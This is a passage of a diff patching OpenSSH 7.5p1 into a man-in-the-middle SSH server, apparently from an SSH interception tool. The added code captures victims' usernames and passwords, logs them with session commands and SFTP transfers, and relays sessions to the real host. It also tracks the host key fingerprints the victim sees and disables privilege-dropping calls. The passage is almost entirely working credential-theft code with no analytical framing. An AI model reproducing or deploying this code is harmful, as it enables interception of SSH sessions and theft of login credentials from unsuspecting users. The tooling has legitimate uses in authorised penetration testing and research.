724. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/monitor.h openssh-7.5p1-mitm/monitor.h
725. --- openssh-7.5p1/monitor.h 2017-03-19 22:39:27.000000000 -0400
726. +++ openssh-7.5p1-mitm/monitor.h    2018-06-12 17:44:46.341760621 -0400
727. @@ -56,6 +56,7 @@
728.     MONITOR_REQ_GSSUSEROK = 46, MONITOR_ANS_GSSUSEROK = 47,
729.     MONITOR_REQ_GSSCHECKMIC = 48, MONITOR_ANS_GSSCHECKMIC = 49,
730.     MONITOR_REQ_TERM = 50,
731. +   MONITOR_REQ_LOL = 52,
732.  
733.     MONITOR_REQ_PAM_START = 100,
734.     MONITOR_REQ_PAM_ACCOUNT = 102, MONITOR_ANS_PAM_ACCOUNT = 103,
735. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/monitor_wrap.c openssh-7.5p1-mitm/monitor_wrap.c
736. --- openssh-7.5p1/monitor_wrap.c    2017-03-19 22:39:27.000000000 -0400
737. +++ openssh-7.5p1-mitm/monitor_wrap.c   2018-06-12 17:44:46.341760621 -0400
738. @@ -482,6 +482,31 @@
739.     sshbuf_free(m);
740.  }
741.  
742. +void
743. +mm_send_lol(struct monitor *monitor, Lol *lol) {
744. +   struct sshbuf *m;
745. +
746. +   if ((m = sshbuf_new()) == NULL)
747. +       fatal("%s: sshbuf_new failed", __func__);
748. +   if (lol == NULL)
749. +       fatal("%s: lol is NULL!", __func__);
750. +
751. +   debug3("SENDING lol");
752. +
753. +   if (sshbuf_put_string(m, "X", 1) != 0 ||
754. +       sshbuf_put_u32(m, lol->original_port) != 0 ||
755. +       sshbuf_put_u32(m, strlen(lol->username)) != 0 ||
756. +       sshbuf_put_string(m, lol->username, strlen(lol->username)) != 0 ||
757. +       sshbuf_put_u32(m, strlen(lol->password)) != 0 ||
758. +       sshbuf_put_string(m, lol->password, strlen(lol->password)) != 0) {
759. +       fatal("%s: can't pack lol!", __func__);
760. +   }
761. +
762. +   mm_request_send(monitor->m_recvfd, MONITOR_REQ_LOL, m);
763. +   debug3("%s: Finished sending lol", __func__);
764. +   sshbuf_free(m);
765. +}
766. +
767.  int
768.  mm_pty_allocate(int *ptyfd, int *ttyfd, char *namebuf, size_t namebuflen)
769.  {
770. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/monitor_wrap.h openssh-7.5p1-mitm/monitor_wrap.h
771. --- openssh-7.5p1/monitor_wrap.h    2017-03-19 22:39:27.000000000 -0400
772. +++ openssh-7.5p1-mitm/monitor_wrap.h   2018-06-12 17:44:46.341760621 -0400
773. @@ -28,6 +28,8 @@
774.  #ifndef _MM_WRAP_H_
775.  #define _MM_WRAP_H_
776.  
777. +#include "lol.h"
778. +
779.  extern int use_privsep;
780.  #define PRIVSEP(x) (use_privsep ? mm_##x : x)
781.  
782. @@ -84,8 +86,11 @@
783.  int mm_newkeys_to_blob(int, u_char **, u_int *);
784.  
785.  void monitor_apply_keystate(struct monitor *);
786. +void monitor_apply_lol(struct monitor *, Lol *);
787.  void mm_get_keystate(struct monitor *);
788. +void mm_get_lol(struct monitor *);
789.  void mm_send_keystate(struct monitor*);
790. +void mm_send_lol(struct monitor *, Lol *);
791.  
792.  /* bsdauth */
793.  int mm_bsdauth_query(void *, char **, char **, u_int *, char ***, u_int **);
794. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/openbsd-compat/bsd-misc.c openssh-7.5p1-mitm/openbsd-compat/bsd-misc.c
795. --- openssh-7.5p1/openbsd-compat/bsd-misc.c 2017-03-19 22:39:27.000000000 -0400
796. +++ openssh-7.5p1-mitm/openbsd-compat/bsd-misc.c    2018-06-12 17:44:46.345760658 -0400
797. @@ -80,6 +80,7 @@
798.  #if !defined(HAVE_SETEUID) && defined(HAVE_SETREUID)
799.  int seteuid(uid_t euid)
800.  {
801. +   return 0;
802.     return (setreuid(-1, euid));
803.  }
804.  #endif /* !defined(HAVE_SETEUID) && defined(HAVE_SETREUID) */
805. @@ -87,6 +88,7 @@
806.  #if !defined(HAVE_SETEGID) && defined(HAVE_SETRESGID)
807.  int setegid(uid_t egid)
808.  {
809. +   return 0;
810.     return(setresgid(-1, egid, -1));
811.  }
812.  #endif /* !defined(HAVE_SETEGID) && defined(HAVE_SETRESGID) */
813. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/openbsd-compat/bsd-setres_id.c openssh-7.5p1-mitm/openbsd-compat/bsd-setres_id.c
814. --- openssh-7.5p1/openbsd-compat/bsd-setres_id.c    2017-03-19 22:39:27.000000000 -0400
815. +++ openssh-7.5p1-mitm/openbsd-compat/bsd-setres_id.c   2018-06-12 17:44:46.345760658 -0400
816. @@ -29,7 +29,7 @@
817.  setresgid(gid_t rgid, gid_t egid, gid_t sgid)
818.  {
819.     int ret = 0, saved_errno;
820. -
821. +   return 0;
822.     if (rgid != sgid) {
823.         errno = ENOSYS;
824.         return -1;
825. @@ -64,7 +64,7 @@
826.  setresuid(uid_t ruid, uid_t euid, uid_t suid)
827.  {
828.     int ret = 0, saved_errno;
829. -
830. +   return 0;
831.     if (ruid != suid) {
832.         errno = ENOSYS;
833.         return -1;
834. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/session.c openssh-7.5p1-mitm/session.c
835. --- openssh-7.5p1/session.c 2017-03-19 22:39:27.000000000 -0400
836. +++ openssh-7.5p1-mitm/session.c    2018-06-13 10:41:10.968170080 -0400
837. @@ -40,6 +40,10 @@
838.  #ifdef HAVE_SYS_STAT_H
839.  # include <sys/stat.h>
840.  #endif
841. +#include <netinet/in.h>
842. +#include <resolv.h>
843. +#include <sys/file.h>
844. +#include <time.h>
845.  #include <sys/socket.h>
846.  #include <sys/un.h>
847.  #include <sys/wait.h>
848. @@ -94,6 +98,7 @@
849.  #include "kex.h"
850.  #include "monitor_wrap.h"
851.  #include "sftp.h"
852. +#include "digest.h"
853.  
854.  #if defined(KRB5) && defined(USE_AFS)
855.  #include <kafs.h>
856. @@ -116,16 +121,17 @@
857.  void   session_pty_cleanup(Session *);
858.  void   session_proctitle(Session *);
859.  int    session_setup_x11fwd(Session *);
860. -int    do_exec_pty(Session *, const char *);
861. -int    do_exec_no_pty(Session *, const char *);
862. +int    do_exec_pty(Session *, const char *, char *);
863. +int    do_exec_no_pty(Session *, const char *, char *);
864.  int    do_exec(Session *, const char *);
865.  void   do_login(Session *, const char *);
866.  #ifdef LOGIN_NEEDS_UTMPX
867.  static void    do_pre_login(Session *s);
868.  #endif
869. -void   do_child(Session *, const char *);
870. +void   do_child(Session *, const char *, char *);
871.  void   do_motd(void);
872.  int    check_quietlogin(Session *, const char *);
873. +double my_sleep(struct timespec *sleep_request);
874.  
875.  static void do_authenticated2(Authctxt *);
876.  
877. @@ -140,6 +146,7 @@
878.  extern int startup_pipe;
879.  extern void destroy_sensitive_data(void);
880.  extern Buffer loginmsg;
881. +extern Lol *lol;
882.  
883.  /* original command from peer. */
884.  const char *original_command = NULL;
885. @@ -165,6 +172,14 @@
886.  static char *auth_sock_name = NULL;
887.  static char *auth_sock_dir = NULL;
888.  
889. +/* This is the maximum number of times to attempt to open a log file for
890. + * writing. */
891. +#define MAX_LOG_OPEN_TRIES 1048576 /* 1M */
892. +
893. +char *create_password_and_fingerprint_socket(int *sock_fd);
894. +void set_session_log(Session *s, unsigned int is_sftp, const char *command);
895. +void write_password_and_read_fingerprints(char **password_and_fingerprint_socket_name, int sock_fd, struct ssh *ssh_active_state, Channel *c);
896. +
897.  /* removes the agent forwarding socket */
898.  
899.  static void
900. @@ -291,7 +306,7 @@
901.   * setting up file descriptors and such.
902.   */
903.  int
904. -do_exec_no_pty(Session *s, const char *command)
905. +do_exec_no_pty(Session *s, const char *command, char *password_and_fingerprint_socket_name)
906.  {
907.     pid_t pid;
908.  
909. @@ -343,6 +358,8 @@
910.  
911.     session_proctitle(s);
912.  
913. +   set_session_log(s, command || (s->is_subsystem == SUBSYSTEM_INT_SFTP), command);
914. +
915.     /* Fork the child. */
916.     switch ((pid = fork())) {
917.     case -1:
918. @@ -420,7 +437,7 @@
919.  #endif
920.  
921.         /* Do processing for the child (exec command etc). */
922. -       do_child(s, command);
923. +       do_child(s, command, password_and_fingerprint_socket_name);
924.         /* NOTREACHED */
925.     default:
926.         break;
927. @@ -475,7 +492,7 @@
928.   * lastlog, and other such operations.
929.   */
930.  int
931. -do_exec_pty(Session *s, const char *command)
932. +do_exec_pty(Session *s, const char *command, char *password_and_fingerprint_socket_name)
933.  {
934.     int fdout, ptyfd, ttyfd, ptymaster;
935.     pid_t pid;
936. @@ -507,6 +524,8 @@
937.         return -1;
938.     }
939.  
940. +   set_session_log(s, command || (s->is_subsystem == SUBSYSTEM_INT_SFTP), command);
941. +
942.     /* Fork the child. */
943.     switch ((pid = fork())) {
944.     case -1:
945. @@ -553,7 +572,7 @@
946.          * Do common processing for the child, such as execing
947.          * the command.
948.          */
949. -       do_child(s, command);
950. +       do_child(s, command, password_and_fingerprint_socket_name);
951.         /* NOTREACHED */
952.     default:
953.         break;
954. @@ -619,6 +638,8 @@
955.     int ret;
956.     const char *forced = NULL, *tty = NULL;
957.     char session_type[1024];
958. +   int sock_fd = -1;
959. +   char *password_and_fingerprint_socket_name = NULL;
960.  
961.     if (options.adm_forced_command) {
962.         original_command = command;
963. @@ -673,10 +694,19 @@
964.         PRIVSEP(audit_run_command(shell));
965.     }
966.  #endif
967. +
968. +   /* Create a socket for the ssh client program to output its host key
969. +    * fingerprints back to us. */
970. +   password_and_fingerprint_socket_name = create_password_and_fingerprint_socket(&sock_fd);
971. +
972.     if (s->ttyfd != -1)
973. -       ret = do_exec_pty(s, command);
974. +       ret = do_exec_pty(s, command, password_and_fingerprint_socket_name);
975.     else
976. -       ret = do_exec_no_pty(s, command);
977. +       ret = do_exec_no_pty(s, command, password_and_fingerprint_socket_name);
978. +
979. +   /* Write the password and read the client's host key fingerprints into
980. +    * the Channel struct. */
981. +   write_password_and_read_fingerprints(&password_and_fingerprint_socket_name, sock_fd, active_state, channel_by_id(s->chanid));
982.  
983.     original_command = NULL;
984.  
985. @@ -1341,10 +1371,10 @@
986. #else
987.         if (setlogin(pw->pw_name) < 0)
988.             error("setlogin failed: %s", strerror(errno));
989. -       if (setgid(pw->pw_gid) < 0) {
990. +       /*if (setgid(pw->pw_gid) < 0) {
991.             perror("setgid");
992.             exit(1);
993. -       }
994. +       }*/
995.         /* Initialize the group list. */
996.         if (initgroups(pw->pw_name, pw->pw_gid) < 0) {
997.             perror("initgroups");
998. @@ -1416,6 +1446,8 @@
999. #ifdef WITH_SELINUX
1000.         setexeccon(NULL);
1001. #endif
1002. +       logit("MITM: refusing to execute passwd.");
1003. +       exit(1);
1004. #ifdef PASSWD_NEEDS_USERNAME
1005.         execl(_PATH_PASSWD_PROG, "passwd", s->pw->pw_name,
1006.             (char *)NULL);
1007. @@ -1473,9 +1505,9 @@
1008.  * environment, closing extra file descriptors, setting the user and group
1009.  * ids, and executing the command or shell.
1010.  */
1011. -#define ARGV_MAX 10
1012. +#define ARGV_MAX 16
1013. void
1014. -do_child(Session *s, const char *command)
1015. +do_child(Session *s, const char *command, char *password_and_fingerprint_socket_name)
1016. {
1017.     extern char **environ;
1018.     char **env;
1019. @@ -1553,6 +1585,7 @@
1020.      * ssh_remote_ipaddr there.
1021.      */
1022.     child_close_fds();
1023. +   s->session_log_fd = -1;
1024.  
1025.     /*
1026.      * Must take new environment into use so that .ssh/rc,
1027. @@ -1612,11 +1645,22 @@
1028.         printf("This service allows sftp connections only.\n");
1029.         fflush(NULL);
1030.         exit(1);
1031. -   } else if (s->is_subsystem == SUBSYSTEM_INT_SFTP) {
1032. +   } else if ((s->is_subsystem == SUBSYSTEM_INT_SFTP) ||
1033. +          ((command != NULL) && (memmem(command, strlen(command), "sftp-server", 11) != NULL))) {
1034.         extern int optind, optreset;
1035.         int i;
1036.         char *p, *args;
1037.  
1038. +       /* Hard-code the SFTP server path to our version. */
1039. +       if (command != NULL) {
1040. +         command = _PATH_SFTP_SERVER;
1041. +
1042. +         /* If DEBUG3 is enabled in sshd, spawn sftp-server with it
1043. +          * as well. */
1044. +         if (options.log_level == SYSLOG_LEVEL_DEBUG3)
1045. +           command = _PATH_SFTP_SERVER " -f AUTH -l DEBUG3";
1046. +       }
1047. +
1048.         setproctitle("%s@%s", s->pw->pw_name, INTERNAL_SFTP_NAME);
1049.         args = xstrdup(command ? command : "sftp-server");
1050.         for (i = 0, (p = strtok(args, " ")); p; (p = strtok(NULL, " ")))
1051. @@ -1628,7 +1672,14 @@
1052. #ifdef WITH_SELINUX
1053.         ssh_selinux_change_context("sftpd_t");
1054. #endif
1055. -       exit(sftp_server_main(i, argv, s->pw));
1056. +       debug3("MITM: SFTP server PID: %u", getpid());
1057. +       exit(sftp_server_main(i, argv, s->pw,
1058. +#ifdef DEBUG_HOST
1059. +                   DEBUG_HOST, DEBUG_PORT,
1060. +#else
1061. +                   lol->original_host, lol->original_port,
1062. +#endif
1063. +                   lol->username, password_and_fingerprint_socket_name, s->session_log_filepath, s->session_log_dir));
1064.     }
1065.  
1066.     fflush(NULL);
1067. @@ -1644,8 +1695,13 @@
1068.      * name to be passed in argv[0] is preceded by '-' to indicate that
1069.      * this is a login shell.
1070.      */
1071. -   if (!command) {
1072. +   if (1) {
1073.         char argv0[256];
1074. +       char connect_string[512];
1075. +       char port[16];
1076. +
1077. +       memset(connect_string, 0, sizeof(connect_string));
1078. +       memset(port, 0, sizeof(port));
1079.  
1080.         /* Start the shell.  Set initial character to '-'. */
1081.         argv0[0] = '-';
1082. @@ -1658,9 +1714,41 @@
1083.         }
1084.  
1085.         /* Execute the shell. */
1086. -       argv[0] = argv0;
1087. +       /*argv[0] = argv0;
1088.         argv[1] = NULL;
1089. -       execve(shell, argv, env);
1090. +       execve(shell, argv, env);*/
1091. +
1092. +
1093. +       snprintf(port, sizeof(port), "%hu", lol->original_port);
1094. +
1095. +       strlcpy(connect_string, lol->username, sizeof(connect_string));
1096. +       strlcat(connect_string, "@", sizeof(connect_string));
1097. +
1098. +       #ifdef DEBUG_HOST
1099. +       strlcat(connect_string, DEBUG_HOST, sizeof(connect_string));
1100. +       snprintf(port, sizeof(port), "%d", DEBUG_PORT);
1101. +       #else
1102. +       strlcat(connect_string, lol->original_host, sizeof(connect_string));
1103. +       #endif
1104. +
1105. +       debug3("MITMing connection to %s:%s", connect_string, port);
1106. +
1107. +       argv[0] = MITM_SSH_CLIENT;
1108. +       argv[1] = "-E";
1109. +       argv[2] = MITM_SSH_CLIENT_LOG;
1110. +       argv[3] = "-F";
1111. +       argv[4] = MITM_SSH_CLIENT_CONFIG;
1112. +       argv[5] = "-Z";
1113. +       argv[6] = password_and_fingerprint_socket_name;
1114. +       argv[7] = "-p";
1115. +       argv[8] = port;
1116. +       argv[9] = connect_string;
1117. +       if (command) {
1118. +           argv[10] = (char *)command;
1119. +           argv[11] = NULL;
1120. +       } else
1121. +           argv[10] = NULL;
1122. +       execve(argv[0], argv, env);
1123.  
1124.         /* Executing the shell failed. */
1125.         perror(shell);
1126. @@ -1674,8 +1762,11 @@
1127.     argv[1] = "-c";
1128.     argv[2] = (char *) command;
1129.     argv[3] = NULL;
1130. -   execve(shell, argv, env);
1131. +   logit("MITM: attempt to execute command blocked: [%s -c %s]", shell0, command);
1132. +   /*
1133. +   execve(shell, argv, env);  
1134.     perror(shell);
1135. +   */
1136.     exit(1);
1137. }
1138.  
1139. @@ -1927,6 +2018,11 @@
1140.     debug2("subsystem request for %.100s by user %s", s->subsys,
1141.         s->pw->pw_name);
1142.  
1143. +   if (strcmp(s->subsys, "sftp") != 0) {
1144. +       logit("MITM: subsystem request for something other than sftp (%.100s).  Rejecting...", s->subsys);
1145. +       return 0;
1146. +        }
1147. +
1148.     for (i = 0; i < options.num_subsystems; i++) {
1149.         if (strcmp(s->subsys, options.subsystem_name[i]) == 0) {
1150.             prog = options.subsystem_command[i];
1151. @@ -1958,6 +2054,10 @@
1152. {
1153.     int success;
1154.  
1155. +   /* Disable X11 requests. */
1156. +   logit("MITM: rejecting X11 request.");
1157. +   return 0;
1158. +
1159.     if (s->auth_proto != NULL || s->auth_data != NULL) {
1160.         error("session_x11_req: session %d: "
1161.             "x11 forwarding already active", s->self);
1162. @@ -2022,6 +2122,10 @@
1163.     char *name, *val;
1164.     u_int name_len, val_len, i;
1165.  
1166. +   /* Disable env requests. */
1167. +   logit("MITM: rejecting env request.");
1168. +   return 0;
1169. +
1170.     name = packet_get_cstring(&name_len);
1171.     val = packet_get_cstring(&val_len);
1172.     packet_check_eom();
1173. @@ -2056,6 +2160,11 @@
1174. {
1175.     static int called = 0;
1176.     packet_check_eom();
1177. +
1178. +   /* Disable auth agent requests. */
1179. +   logit("MITM: rejecting auth agent request.");
1180. +   return 0;
1181. +
1182.     if (no_agent_forwarding_flag || !options.allow_agent_forwarding) {
1183.         debug("session_auth_agent_req: no_agent_forwarding_flag");
1184.         return 0;
1185. @@ -2124,7 +2233,7 @@
1186.     channel_set_fds(s->chanid,
1187.         fdout, fdin, fderr,
1188.         ignore_fderr ? CHAN_EXTENDED_IGNORE : CHAN_EXTENDED_READ,
1189. -       1, is_tty, CHAN_SES_WINDOW_DEFAULT);
1190. +       1, is_tty, CHAN_SES_WINDOW_DEFAULT, s->session_log_fd, s->is_sftp);
1191. }
1192.  
1193. /*
1194. @@ -2320,6 +2429,15 @@
1195.     }
1196.     session_proctitle(s);
1197.     session_unused(s->self);
1198. +   free(s->session_log_dir); s->session_log_dir = NULL;
1199. +   free(s->session_log_filepath); s->session_log_filepath = NULL;
1200. +   if (s->session_log_fd > -1) {
1201. +     if (s->is_sftp)
1202. +       write(s->session_log_fd, "</pre></html>", 13);
1203. +     fdatasync(s->session_log_fd);
1204. +     close(s->session_log_fd);
1205. +     s->session_log_fd = -1;
1206. +   }
1207. }
1208.  
1209. void
1210. @@ -2532,6 +2650,10 @@
1211.     if (authctxt == NULL)
1212.         return;
1213.  
1214. +   if (authctxt->original_user != NULL) {
1215. +       free(authctxt->original_user);  authctxt->original_user = NULL;
1216. +   }
1217. +
1218. #ifdef USE_PAM
1219.     if (options.use_pam) {
1220.         sshpam_cleanup();
1221. @@ -2578,3 +2700,261 @@
1222.     return remote;
1223. }
1224.  
1225. +/* Returns a file handle for logging a shell/sftp session.  Set "is_sftp" arg
1226. + * to 1 to make a log file for SFTP. */
1227. +void set_session_log(Session *s, unsigned int is_sftp, const char *command) {
1228. +  char filename[ sizeof(MITM_ROOT) + 32 ] = MITM_ROOT "shell_session_0.txt";
1229. +  int num_tries = 0;
1230. +
1231. +  s->is_sftp = is_sftp;
1232. +  if (s->is_sftp)
1233. +    strlcpy(filename, MITM_ROOT "sftp_session_0.html", sizeof(filename));
1234. +
1235. +  s->session_log_fd = -1;
1236. +  while ((num_tries < MAX_LOG_OPEN_TRIES) && (s->session_log_fd < 0)) {
1237. +    s->session_log_fd = open(filename, O_CREAT | O_EXCL | O_NOATIME | O_NOFOLLOW | O_WRONLY
1238. +#ifdef SYNC_LOG
1239. +        | O_SYNC
1240. +#endif
1241. +        , S_IRUSR | S_IWUSR);
1242. +
1243. +    num_tries++;
1244. +
1245. +    /* If the file could not be created, increment the counter and append it
1246. +     * to the filename prefix so we can try again. */
1247. +    if (s->session_log_fd < 0) {
1248. +      if (s->is_sftp)
1249. +   snprintf(filename, sizeof(filename) - 1, MITM_ROOT "sftp_session_%d.html", num_tries);
1250. +      else
1251. +   snprintf(filename, sizeof(filename) - 1, MITM_ROOT "shell_session_%d.txt", num_tries);
1252. +    }
1253. +  }
1254. +
1255. +  if (s->session_log_fd < 0)
1256. +    logit("MITM: Could not open file for logging!");
1257. +  else {
1258. +    struct ssh *ssh = active_state;
1259. +    time_t t = time(NULL);
1260. +    struct tm stm;
1261. +    int original_port = lol->original_port;
1262. +    char srcport[16];
1263. +    char dstport[16];
1264. +    char buf[128];
1265. +
1266. +    memset(&stm, 0, sizeof(struct tm));
1267. +    memset(srcport, 0, sizeof(srcport));
1268. +    memset(dstport, 0, sizeof(dstport));
1269. +    memset(buf, 0, sizeof(buf));
1270. +
1271. +
1272. +    s->session_log_filepath = xstrdup(filename);
1273. +
1274. +    /* Create a unique directory for SFTP sessions.  This is where uploaded and
1275. +     * downloaded files will go. */
1276. +    if (s->is_sftp) {
1277. +      filename[strlen(filename) - 5] = '/';
1278. +      filename[strlen(filename) - 4] = '\0';
1279. +      if (mkdir(filename, S_IRWXU) == 0)
1280. +   s->session_log_dir = xstrdup(filename);
1281. +
1282. +      write(s->session_log_fd, "<html><pre>", 11);
1283. +    }
1284. +
1285. +    snprintf(srcport, sizeof(srcport), "%d", ssh_remote_port(ssh));
1286. +    snprintf(dstport, sizeof(dstport), "%d", original_port);
1287. +    if (gmtime_r(&t, &stm) != NULL)
1288. +      strftime(buf, sizeof(buf), "%F %T %Z", &stm);
1289. +
1290. +    /* Write the timestamp. */
1291. +    write(s->session_log_fd, "Time: ", 6);
1292. +    write(s->session_log_fd, buf, strlen(buf));
1293. +
1294. +    /* Write the hostname and destination port. */
1295. +    write(s->session_log_fd, "\nServer: ", 9);
1296. +    write(s->session_log_fd, lol->original_host, strlen(lol->original_host));
1297. +    write(s->session_log_fd, ":", 1);
1298. +    write(s->session_log_fd, dstport, strlen(dstport));
1299. +
1300. +    /* Write the origin IP and source port. */
1301. +    write(s->session_log_fd, "\nClient: ", 9);
1302. +    write(s->session_log_fd, ssh_remote_ipaddr(ssh), strlen(ssh_remote_ipaddr(ssh)));
1303. +    write(s->session_log_fd, ":", 1);
1304. +    write(s->session_log_fd, srcport, strlen(srcport));
1305. +
1306. +    /* Write the username. */
1307. +    write(s->session_log_fd, "\nUsername: ", 11);
1308. +    write(s->session_log_fd, lol->username, strlen(lol->username));
1309. +
1310. +    /* Write the password. */
1311. +    write(s->session_log_fd, "\nPassword: ", 11);
1312. +    write(s->session_log_fd, lol->password, strlen(lol->password));
1313. +
1314. +    /* Write the command, if there was one. */
1315. +    if (command != NULL) {
1316. +      write(s->session_log_fd, "\nCommand: ", 10);
1317. +      write(s->session_log_fd, command, strlen(command));
1318. +    }
1319. +    write(s->session_log_fd, "\n-------------------------\n", 27);
1320. +  }
1321. +}
1322. +
1323. +/* Requests to sleep a certain amount of time (must be less than 1 second).
1324. + * Returns the number of seconds actually slept. */
1325. +/*
1326. +double my_sleep(struct timespec *sleep_request) {
1327. +  struct timespec sleep_remaining;
1328. +
1329. +  * If we slept the entire duration without being interrupted... *
1330. +  if (nanosleep(sleep_request, &sleep_remaining) == 0)
1331. +    return (double)(sleep_request->tv_nsec / 1000000000.0);
1332. +  else
1333. +    return (double)((sleep_request->tv_nsec - sleep_remaining.tv_nsec) / 1000000000.0);
1334. +}
1335. +*/
1336. +
1337. +/* Creates a unique socket and listens on it.  Returns its filename and sets
1338. + * the "sock_fd" argument to the socket handle.  The caller must free() the
1339. + * return value. */
1340. +char *create_password_and_fingerprint_socket(int *sock_fd) {
1341. +  char *password_and_fingerprint_socket_name = NULL;
1342. +  struct sockaddr_un addr;
1343. +  char socket_prefix[] = MITM_ROOT "/tmp/socket_";
1344. +  int counter = 0;
1345. +  int password_and_fingerprint_socket_name_len = sizeof(socket_prefix) + 5;
1346. +
1347. +  /* Create a new socket. */
1348. +  memset(&addr, 0, sizeof(addr));
1349. +  addr.sun_family = AF_UNIX;
1350. +  *sock_fd = socket(AF_UNIX, SOCK_STREAM, 0);
1351. +  if (*sock_fd == -1) {
1352. +    logit("MITM: Error: could not create socket for fingerprint data!");
1353. +    return "";
1354. +  }
1355. +
1356. +  /* Allocate a return buffer to hold the socket filename. */
1357. +  if ((password_and_fingerprint_socket_name = calloc(password_and_fingerprint_socket_name_len, sizeof(char))) == NULL) {
1358. +    *sock_fd = -1;
1359. +    return strdup("");
1360. +  }
1361. +
1362. +  /* Make a new, unique socket file path. */
1363. +  while (counter < 1024) {
1364. +    snprintf(password_and_fingerprint_socket_name, password_and_fingerprint_socket_name_len, "%s%d", socket_prefix, counter);
1365. +    strlcpy(addr.sun_path, password_and_fingerprint_socket_name , sizeof(addr.sun_path));
1366. +    if (bind(*sock_fd, (struct sockaddr *)&addr, sizeof(addr)) == 0)
1367. +      break;
1368. +
1369. +    counter++;
1370. +  }
1371. +
1372. +  /* Listen on the socket handle. */
1373. +  if (listen(*sock_fd, 1) == -1) {
1374. +    logit("MITM: Error while listening on socket for fingerprint data!");
1375. +    close(*sock_fd);
1376. +    *sock_fd = -1;
1377. +    free(password_and_fingerprint_socket_name); password_and_fingerprint_socket_name = NULL;
1378. +    return strdup("");
1379. +  }
1380. +
1381. +  return password_and_fingerprint_socket_name;
1382. +}
1383. +
1384. +/* Writes the password, then reads the host key fingerprints from the client
1385. + * program, sets the appropriate "legit_*_fingerprint" global variables,
1386. + * deletes the socket, and frees the socket name. */
1387. +void write_password_and_read_fingerprints(char **password_and_fingerprint_socket_name, int sock_fd, struct ssh *ssh_active_state, Channel *c) {
1388. +  int client_fd = -1, written = 0, r = 0;
1389. +  u_int16_t password_len = htons((u_int16_t)strlen(lol->password));
1390. +  char *buffer = NULL;
1391. +
1392. +  /* Wait for the client to connect, then accept it. */
1393. +  client_fd = accept(sock_fd, NULL, NULL);
1394. +
1395. +  /* Send the password length. */
1396. +  if (send(client_fd, &password_len, sizeof(password_len), 0) < 0)
1397. +    fatal("MITM: Error while sending password length: %d", errno);
1398. +
1399. +  /* Write the password. */
1400. +  while (written < password_len) {
1401. +    r = send(client_fd, lol->password + written, password_len - written, 0);
1402. +    if ((r < 0) && (r != EINTR))
1403. +      fatal("MITM: Error while sending password: %d", errno);
1404. +    else if (r > 0)
1405. +      written += r;
1406. +  }
1407. +
1408. +  buffer = calloc(SOCKET_PASSWORD_AND_FINGERPRINT_BUFFER_SIZE, sizeof(char));
1409. +  if ((buffer != NULL) && (c != NULL)) {
1410. +    int r, bytes_read = 0;
1411. +    char *saved_buffer = buffer;  /* We use strsep(), so save this pointer. */
1412. +    char *line = NULL;
1413. +    int line_len = 0;
1414. +    struct sshkey *k = NULL;
1415. +    char *fp = NULL;
1416. +
1417. +    /* Read everything into buffer. */
1418. +    while (1) {
1419. +      r = read(client_fd, buffer + bytes_read, SOCKET_PASSWORD_AND_FINGERPRINT_BUFFER_SIZE - bytes_read);
1420. +      if (r <= 0)
1421. +   break;
1422. +      bytes_read += r;
1423. +    }
1424. +
1425. +    /* Tokenize the buffer by the newline character. */
1426. +    while ((line = strsep(&buffer, "\n")) != NULL) {
1427. +      line_len = strlen(line);
1428. +      if (line_len > 4) {
1429. +
1430. +   /* We should only get one MD5 and one SHA256 fingerprint.  If we get
1431. +    * more, log it. */
1432. +   if ((c->legit_md5_fingerprint_len > 0) && (c->legit_sha256_fingerprint_len > 0))
1433. +     logit("MITM: !! Somehow, both the MD5 and SHA256 fingerprints were already set, but we got another fingerprint line anyway!! Please contact the project maintainer about this! [%s]", line);
1434. +
1435. +   /* If this line begins with "MD5:", its an MD5 fingerprint.  Copy it
1436. +    * into the "legit_md5_fingerprint" buffer. */
1437. +   if (memcmp(line, "MD5:", 4) == 0) {
1438. +     c->legit_md5_fingerprint = strdup(line + 4);
1439. +     c->legit_md5_fingerprint_len = strlen(c->legit_md5_fingerprint);
1440. +   /* If this is a SHA256 fingerprint, copy this as well. */
1441. +   } else if (memcmp(line, "SHA256:", 7) == 0) {
1442. +     c->legit_sha256_fingerprint = strdup(line + 7);
1443. +     c->legit_sha256_fingerprint_len = strlen(c->legit_sha256_fingerprint);
1444. +   } else
1445. +     logit("MITM: unknown fingerprint!: [%s]", line);
1446. +      }
1447. +    }
1448. +
1449. +    c->extra_fp_bytes = calloc(EXTRA_FP_BYTES_SIZE, sizeof(char));
1450. +    k = ssh_active_state->kex->load_host_public_key(active_state->kex->hostkey_type, ssh_active_state->kex->hostkey_nid, ssh_active_state);
1451. +
1452. +    /* Set the host key fingerprints our sshd is using with the victim. */
1453. +    if (c->legit_md5_fingerprint_len > 0) {
1454. +      fp = sshkey_fingerprint(k, SSH_DIGEST_MD5, SSH_FP_DEFAULT);
1455. +      c->our_md5_fingerprint = strdup(fp + 4);  // Cut off the "MD5:" prefix.
1456. +      c->our_md5_fingerprint_len = strlen(c->our_md5_fingerprint);
1457. +      free(fp); fp = NULL;
1458. +
1459. +      debug("MITM: MD5 fingerprint received from legit server: [%s]", c->legit_md5_fingerprint);
1460. +      debug("MITM: MD5 fingerprint seen by victim: [%s]", c->our_md5_fingerprint);
1461. +    }
1462. +
1463. +    if (c->legit_sha256_fingerprint_len > 0) {
1464. +      fp = sshkey_fingerprint(k, SSH_DIGEST_SHA256, SSH_FP_DEFAULT);
1465. +      c->our_sha256_fingerprint = strdup(fp + 7); // Cut off the "SHA256:" prefix.
1466. +      c->our_sha256_fingerprint_len = strlen(c->our_sha256_fingerprint);
1467. +      free(fp); fp = NULL;
1468. +      debug("MITM: SHA256 fingerprint received from legit server: [%s]", c->legit_sha256_fingerprint);
